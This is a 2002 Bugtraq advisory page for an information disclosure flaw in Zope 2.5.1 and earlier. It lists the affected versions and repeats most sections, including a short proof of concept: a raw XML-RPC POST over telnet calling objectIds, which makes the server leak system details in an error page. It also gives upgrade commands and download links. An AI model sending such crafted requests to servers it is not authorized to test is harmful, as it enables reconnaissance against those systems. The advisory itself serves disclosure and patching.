Zope Incorrect XML-RPC Request Information Disclosure Vulnerability
BID:5806
Info
Zope Incorrect XML-RPC Request Information Disclosure Vulnerability
| Bugtraq ID: | 5806 |
| Class: | Unknown |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | Sep 26 2002 12:00AM |
| Updated: | Sep 26 2002 12:00AM |
| Credit: | Discovery of this vulnerability credited to Rossen Raykov <[email protected]>. |
| Vulnerable: |
Zope Zope 2.5.1 Zope Zope 2.5 .0 Zope Zope 2.4.4 b1 Zope Zope 2.4.3 Zope Zope 2.4.2 Zope Zope 2.4.1 Zope Zope 2.4 .0 Zope Zope 2.3.3 Zope Zope 2.3.2 |
| Not Vulnerable: |
Zope Zope 2.6 .0b1 Zope Zope 2.5.1 b1 |
Discussion
Zope Incorrect XML-RPC Request Information Disclosure Vulnerability
A vulnerability has been reported for Zope 2.5.1 and earlier. Reportedly, Zope does not handle XML-RPC requests properly. Specially crafted XML-RPC requests may cause Zope to respond to a request with an error page with system specific details.
A vulnerability has been reported for Zope 2.5.1 and earlier. Reportedly, Zope does not handle XML-RPC requests properly. Specially crafted XML-RPC requests may cause Zope to respond to a request with an error page with system specific details.
Exploit / POC
Zope Incorrect XML-RPC Request Information Disclosure Vulnerability
The following proof of concept was provided:
telnet localhost 8080
POST /Documentation/comp_tut HTTP/1.0
Host: localhost
Content-Type: text/xml
Content-length: 93
<?xml version="1.0"?>
<methodCall>
<methodName>objectIds</methodName>
<params/>
</methodCall>
The following proof of concept was provided:
telnet localhost 8080
POST /Documentation/comp_tut HTTP/1.0
Host: localhost
Content-Type: text/xml
Content-length: 93
<?xml version="1.0"?>
<methodCall>
<methodName>objectIds</methodName>
<params/>
</methodCall>
Solution / Fix
Zope Incorrect XML-RPC Request Information Disclosure Vulnerability
Solution:
Zope versions 2.5.1b2 and later are reportedly not vulnerable to this issue.
Gentoo Linux has released an advisory. Users of net-www/zope-2.5.1 and earlier are urged to update their systems by issuing the following commands:
emerge rsync
emerge zope
emerge clean
Fixes are available:
Zope Zope 2.3.2
Zope Zope 2.3.3
Zope Zope 2.4 .0
Zope Zope 2.4.1
Zope Zope 2.4.2
Zope Zope 2.4.3
Zope Zope 2.4.4 b1
Zope Zope 2.5 .0
Zope Zope 2.5.1
Solution:
Zope versions 2.5.1b2 and later are reportedly not vulnerable to this issue.
Gentoo Linux has released an advisory. Users of net-www/zope-2.5.1 and earlier are urged to update their systems by issuing the following commands:
emerge rsync
emerge zope
emerge clean
Fixes are available:
Zope Zope 2.3.2
-
Zope Zope-2.6.0b1-linux2-x86.tgz
http://www.zope.org/Products/Zope/2.6.0b1/Zope-2.6.0b1-linux2-x86.tgz -
Zope Zope-2.6.0b1-solaris-2.8-sparc.tgz
http://www.zope.org/Products/Zope/2.6.0b1/Zope-2.6.0b1-solaris-2.8-spa rc.tgz -
Zope Zope-2.6.0b1-win32-x86.exe
http://www.zope.org/Products/Zope/2.6.0b1/Zope-2.6.0b1-win32-x86.exe
Zope Zope 2.3.3
-
Zope Zope-2.6.0b1-linux2-x86.tgz
http://www.zope.org/Products/Zope/2.6.0b1/Zope-2.6.0b1-linux2-x86.tgz -
Zope Zope-2.6.0b1-solaris-2.8-sparc.tgz
http://www.zope.org/Products/Zope/2.6.0b1/Zope-2.6.0b1-solaris-2.8-spa rc.tgz -
Zope Zope-2.6.0b1-win32-x86.exe
http://www.zope.org/Products/Zope/2.6.0b1/Zope-2.6.0b1-win32-x86.exe
Zope Zope 2.4 .0
-
Zope Zope-2.6.0b1-linux2-x86.tgz
http://www.zope.org/Products/Zope/2.6.0b1/Zope-2.6.0b1-linux2-x86.tgz -
Zope Zope-2.6.0b1-solaris-2.8-sparc.tgz
http://www.zope.org/Products/Zope/2.6.0b1/Zope-2.6.0b1-solaris-2.8-spa rc.tgz -
Zope Zope-2.6.0b1-win32-x86.exe
http://www.zope.org/Products/Zope/2.6.0b1/Zope-2.6.0b1-win32-x86.exe
Zope Zope 2.4.1
-
Zope Zope-2.6.0b1-linux2-x86.tgz
http://www.zope.org/Products/Zope/2.6.0b1/Zope-2.6.0b1-linux2-x86.tgz -
Zope Zope-2.6.0b1-solaris-2.8-sparc.tgz
http://www.zope.org/Products/Zope/2.6.0b1/Zope-2.6.0b1-solaris-2.8-spa rc.tgz -
Zope Zope-2.6.0b1-win32-x86.exe
http://www.zope.org/Products/Zope/2.6.0b1/Zope-2.6.0b1-win32-x86.exe
Zope Zope 2.4.2
-
Zope Zope-2.6.0b1-linux2-x86.tgz
http://www.zope.org/Products/Zope/2.6.0b1/Zope-2.6.0b1-linux2-x86.tgz -
Zope Zope-2.6.0b1-solaris-2.8-sparc.tgz
http://www.zope.org/Products/Zope/2.6.0b1/Zope-2.6.0b1-solaris-2.8-spa rc.tgz -
Zope Zope-2.6.0b1-win32-x86.exe
http://www.zope.org/Products/Zope/2.6.0b1/Zope-2.6.0b1-win32-x86.exe
Zope Zope 2.4.3
-
Zope Zope-2.6.0b1-linux2-x86.tgz
http://www.zope.org/Products/Zope/2.6.0b1/Zope-2.6.0b1-linux2-x86.tgz -
Zope Zope-2.6.0b1-solaris-2.8-sparc.tgz
http://www.zope.org/Products/Zope/2.6.0b1/Zope-2.6.0b1-solaris-2.8-spa rc.tgz -
Zope Zope-2.6.0b1-win32-x86.exe
http://www.zope.org/Products/Zope/2.6.0b1/Zope-2.6.0b1-win32-x86.exe
Zope Zope 2.4.4 b1
-
Zope Zope-2.6.0b1-linux2-x86.tgz
http://www.zope.org/Products/Zope/2.6.0b1/Zope-2.6.0b1-linux2-x86.tgz -
Zope Zope-2.6.0b1-solaris-2.8-sparc.tgz
http://www.zope.org/Products/Zope/2.6.0b1/Zope-2.6.0b1-solaris-2.8-spa rc.tgz -
Zope Zope-2.6.0b1-win32-x86.exe
http://www.zope.org/Products/Zope/2.6.0b1/Zope-2.6.0b1-win32-x86.exe
Zope Zope 2.5 .0
-
Zope Zope-2.6.0b1-linux2-x86.tgz
http://www.zope.org/Products/Zope/2.6.0b1/Zope-2.6.0b1-linux2-x86.tgz -
Zope Zope-2.6.0b1-solaris-2.8-sparc.tgz
http://www.zope.org/Products/Zope/2.6.0b1/Zope-2.6.0b1-solaris-2.8-spa rc.tgz -
Zope Zope-2.6.0b1-win32-x86.exe
http://www.zope.org/Products/Zope/2.6.0b1/Zope-2.6.0b1-win32-x86.exe
Zope Zope 2.5.1
-
Zope Zope-2.6.0b1-linux2-x86.tgz
http://www.zope.org/Products/Zope/2.6.0b1/Zope-2.6.0b1-linux2-x86.tgz -
Zope Zope-2.6.0b1-solaris-2.8-sparc.tgz
http://www.zope.org/Products/Zope/2.6.0b1/Zope-2.6.0b1-solaris-2.8-spa rc.tgz -
Zope Zope-2.6.0b1-win32-x86.exe
http://www.zope.org/Products/Zope/2.6.0b1/Zope-2.6.0b1-win32-x86.exe
References
Zope Incorrect XML-RPC Request Information Disclosure Vulnerability
References:
References:
- Welcome to Zope.org (Zope)